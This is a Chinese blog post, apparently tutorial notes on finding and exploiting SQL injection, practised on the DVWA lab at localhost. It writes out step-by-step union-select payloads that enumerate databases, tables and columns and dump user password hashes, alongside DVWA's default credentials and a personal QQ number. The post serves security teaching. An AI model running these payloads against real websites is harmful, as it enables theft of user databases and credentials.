拿到一个网站,怎么判断该网站是否存在sql注入漏洞?

最新推荐文章于 2024-04-24 18:27:59 发布
最新推荐文章于 2024-04-24 18:27:59 发布
阅读量2.9k 收藏 8
点赞数 1
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_76002918/article/details/129385782
版权

漏洞挖掘 漏洞利用 修复漏洞

 sql注入漏洞、文件操作漏洞、xss、rce、逻辑漏洞

反序列化、、、、

 sql注入漏洞: 网站的数据库 脱裤 拖取网站数据库

 数据库基础:

 数据库基本结构:数据库 -- 数据表 -- 数据列 -- 数据

 sql语句:select * from 数据表的名称 where 数据列的名称=1

 web基础:

 https://www.aaa.com/index.php?id=1

 url:统一资源定位符

 域名:www.aaa.com

 ?id=1 请求id为1的内容 ? get请求 post请求

 select * from 数据表的名称 where id=1

 拿到一个网站,怎么判断该网站是否存在sql注入漏洞?

 1.找交互点 网站跟数据库进行互动的地方 url 搜索框 登录框

 2.找注入点 '

 看回显结果,回显结果不正常显示,就说明这个位置是一个注入点

 如果一个网站存在注入点,那么说明该网站存在sql注入漏洞

 int类型 整型 where id=1'

 char类型 字符型 where id='1''

 3.漏洞利用

 ①手工注入

 (1)判断注入类型 and 1=1 and 1=2

 1 and 1=1 and 运算符 真 and 真 真 就会正常显示1的内容

 1 and 1=2 真 and 假 假 不正常显示

 看回显结果,如果回显结果不一样,则为int类型,那么后续的语句正常写

 反之,回显结果一样,说明是char类型,那么后面的语句 都要加上 ' 闭合 # --+ 注释

 ?id=1和2 1 和 2 两个人

 int类型 整型 where id=1和2 1 和 2 两个人

 char类型 字符型 where id='1' order by 1#' 一个人 1和2

 (2)判断列数 order by 二分法 列数为2

 1' order by 1#

 (3)看回显位置 union select 联合查询

 1' and 1=2 union select 1,2#

 (4)查询数据库名称 dvwa

 1' and 1=2 union select 1,database()#

 (5)查询数据表的名称 guestbook users

 1' and 1=2 union select 1,table_name from

 information_schema.tables where table_schema='dvwa'#

 information_schema //数据库的一个名称

 tables //是information_schema下面的一张表

 (6)查询数据列的名称 user password

 1' and 1=2 union select 1,column_name from

 information_schema.columns where table_name='users'#

 (7)读取数据 5f4dcc3b5aa765d61d8327deb882cf99 md5 撞库

 1' and 1=2 union select 1,password from users#

 1' and 1=2 union select 1,concat(user,'~~~',password) from users#

 admin5f4dcc3b5aa765d61d8327deb882cf99

 qq:1191674313 郑渊

 ②工具注入 脚本小子

 搭建网站:

 服务器 --> 操作系统 windows Linux、

 中间件 apache nginx iis tomcat、、、

 数据库 mysql sqlserver access 、、、

 源码

 PHPstudy 一键部署网站

 dvwa 靶场

 访问:打开浏览器 127.0.0.1/dvwa-master

 默认的账号密码:admin password

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

2201_76002918
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
SQL注入笔记
weixin_42695055的博客
12-28 1134
利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞网站上的数据库,而不是按照设计者意图去执行SQL语句。
SQL注入语句大全-.判断有无注入点
04-21
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0(select count(*) from *) and 0(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count(*) from admin) and 1<(select count(*) from admin) 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称
SQL注入简介
01-20
 SQL Injection这个话题越来越热了,很多的论坛和hack站点都或多或少地在谈论这个问题,当然也有很多革命前辈写了N多的关于这方面的文章,所利用的也是许多知名的程序,比如动网,尘缘雅境,而我们也可以拿到免费的程序来看其中的漏洞和数据库的结构,从中来达到注入的目的,不过如果是别人自己写的程序,那么我们就不知道他的源代码,更不知道他的数据库结构(数据表名和其中的字段名),就算有个变量未过滤提交到数据库去,我们也是无从对其下手的,只能利用通过猜解他的数据库结构来构造相应的SQL语句,那么是不是就到此为止,能猜到多少是多少呢?没有做不到的,只有想不到的,我相信这篇文章对研究SQL Injection朋友来说,应该会有所启发。
PHP代码网站如何防范SQL注入漏洞攻击建议分享
12-19
黑客通过SQL注入攻击可以拿到网站数据库的访问权限,之后他们就可以拿到网站数据库中所有的数据,恶意的黑客可以通过SQL注入功能篡改数据库中的数据甚至会把数据库中的数据毁坏掉。做为网络开发者的你对这种黑客行为恨之入骨,当然也有必要了解一下SQL注入这种功能方式的原理并学会如何通过代码来保护自己的网站数据库。今天就通过PHP和MySQL数据库为例,分享一下我所了解的SQL注入攻击和一些简单的防范措施和一些如何避免SQL注入攻击的建议。 什么是SQL注入SQL Injection)? 简单来说,SQL注入是使用代码漏洞来获取网站或应用程序后台的SQL数据库中的数据,进而可以取得数据库的访问权限。比
Web安全之SQL注入
weixin_52741673的博客
07-16 296
Web安全之SQL注入
【干货】如何判断 Sql 注入点
未名编程
07-19 8480
注:本文在Jewel591 文章片段的基础上加以实例说明而成 原文链接 1.判断是否存在 Sql 注入漏洞2.判断 Sql 注入漏洞的类型2.1 数字型判断:2.2 字符型判断:3.实例说明less-1数值型方法判断字符型方法判断less-2 通常情况下,可能存在 Sql 注入漏洞的 Url 是类似这种形式 :http://xxx.xxx.xxx/abcd.php?id=XX对 Sql 注入的判断,主要有两个方面: 判断该带参数的 Url 是否存在 Sql 注入? 如果存在 Sql 注入,那么属于
sql注入基础-如何判断 Sql 注入点+实例说明
m0_60884805的博客
10-11 6160
可能存在注入的url形式:http://xxx.xxx.xxx/abcd.php?id=XXX判断sql注入:1.判断此url是否存在sql注入2.若存在sql注入,属于那种? 数字型判断: 可以使用经典的 and 1=1 和 and 1=2 来判断. url中输入?id=1 and 1=1 页面依旧正常运行,继续下一步. url中输入?id=1 and 1=2 页面运行错误,则说明此 Sql 注入为数字型注入。
SQL漏洞-SQL注入实战-SQL注入判断
m0_52701599的博客
01-23 1876
SQL注入漏洞SQL注入漏洞判断
网页是否存在SQL注入(单引号判断法)
菜鸟-传奇
11-10 5569
是否存在SQL注入的简单判断 单引号判断 $id参数左右有数字型(无)、单引号、双引号、括号等方式组成闭合; 最为经典的单引号判断法: 在参数后面加上单引号,比如:   http://xxx/abc.php?id=1'   如果页面返回错误,则存在 Sql 注入。 原因是无论字符型还是整型都会因为单引号个数不匹配而报错。   通常 Sql 注入漏洞分为 2 种类型:   数字型   字符...
漏洞学习--SQL注入
qq_45675619的博客
02-19 5223
漏洞学习--SQL注入
SQL注入-02】SQL注入点的简单判断
m0_64378913的博客
04-24 7919
目录实验环境准备工作SQL 注入点的判断1 背景2 判断方法2.2 分析过程3 引号闭合4 总结 实验环境 实验靶场——虚拟机(IP为172.16.1.1):本节实验靶场是在win2008系统上基于phpstudy搭建的一个简单网站,win2008及phpstudy的安装过程可以参考《【语言环境】WAMP环境部署及优化—以win2008R2SP1为操作系统》,网站的搭建过程可以参考《【(SQL+HTML+PHP)综合】一个简单论坛网站的综合开发案例》 注入工具——真实机:本实验利用火狐浏览器来实现union
云计算安全SQL注入攻击.pdf
01-14
并顺利执行,则相当于黑客直接拿到了Webshell 4、一旦黑客拿到Webshell,则可以拿到Web应用的数据,删除Web文件,本地提权,进一步拿下整个服务器甚至内网 5、SQL注入攻击的对象是数据库服务,文件上传漏洞主要攻击...
【推荐】网络安全中的漏洞挖掘实践合集.zip
09-03
如何从高赏金项目中拿到高危 如何去挖掘物联网环境中的高级恶意软件威胁 如何在3个月发现 12 个内核信息泄露漏洞 沙箱内持久化.行之有效的沙箱攻击新思路 深度解析Weblogic_XMLDecoder反序列化 使用...
Web渗透-网络安全面试 面试宝典 2023最新版65页超全解析.pdf
10-16
1.2.1 拿到一个待检测的站或给你一个网站,你觉得应该先 1.2.2 你在渗透测试过程中是如何敏感信息收集的 1.2.3 你平时常去那些网站进行学习、挖漏洞提交到那些平 1.2.4 判断网站的CMS对渗透有什么意义? 1.2.5 一个...
SQL Server详细使用教程
DYFdingyifei的博客
04-23 608
例如,要向名为“Customers”的表中插入一条新记录,您可以使用以下语句: INSERT INTO Customers (CustomerName, ContactName, Address, City, Country) VALUES ('Google', 'Larry Page', '1600 Amphitheatre Parkway', 'Mountain View', 'USA');本篇文章将为您提供SQL Server的详细使用教程,包括数据库的创建、表的创建、数据的插入和查询等内容。
[SWPUCTF-2022-新生赛]ez_sql
最新发布
liaochonxiang的博客
04-24 384
根据提示,POST传参得到假的flag。
专注 APT 攻击与防御—工具介绍—Sqlmap
weixin_62641226的博客
04-23 346
sqlmap参数详解:由于Sqlmap 是常用工具之一,所以本篇的篇幅较长,详解一次所有参数。
【数据库】MySQL分页查询
学习笔记,人工智能,教程,技术分享!
04-19 640
比如:size=10那么, page 和 size 记录范围 和 起始记录索引值 limit。limit offset(开始记录索引,是从0开始的),size(要取出的条数);通用的分页查询写法(page:页数,size:每页显示的记录条数)记住每页的起始记录索引值:(page-1)*size。案例:(查询有奖金且工资最高的前10名的员工信息)案例:(查询第11条到第25条)2页:11-20条 10,10。案例:(查询前5条员工数据)1页: 1-10条 0,10。where ....等等。
SQL的基础语句
qq_51321722的博客
04-22 1103
因此在写子查询语句时,可以先测试下内层的子查询语句是否输出了想要的内容,再一层层往外测试,增加子查询正确率。使用SELECT查询时,如果结果集数据量很大,比如几万行数据,放在一个页面显示的话数据量太大,不如分页显示,每次显示100条。上述查询LIMIT 3 OFFSET 0表示,对结果集从0号记录开始,最多取3条。包含左边表的全部行(不管右边的表中是否存在与他们匹配的行),以及右边表中全部匹配的行。包含右边表的全部行(不管右边的表中是否存在与他们匹配的行),以及左边表中全部匹配的行。
如何根据一个数据包判断是否存在sql注入漏洞
02-15
判断一个数据包是否存在SQL注入漏洞点,可以采用以下步骤: 1. 检查数据包的输入字段:如果输入字段包含特殊字符(例如单引号、双引号等),则需要进一步检查。 2. 对数据包进行模拟测试:尝试将恶意字符注入到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值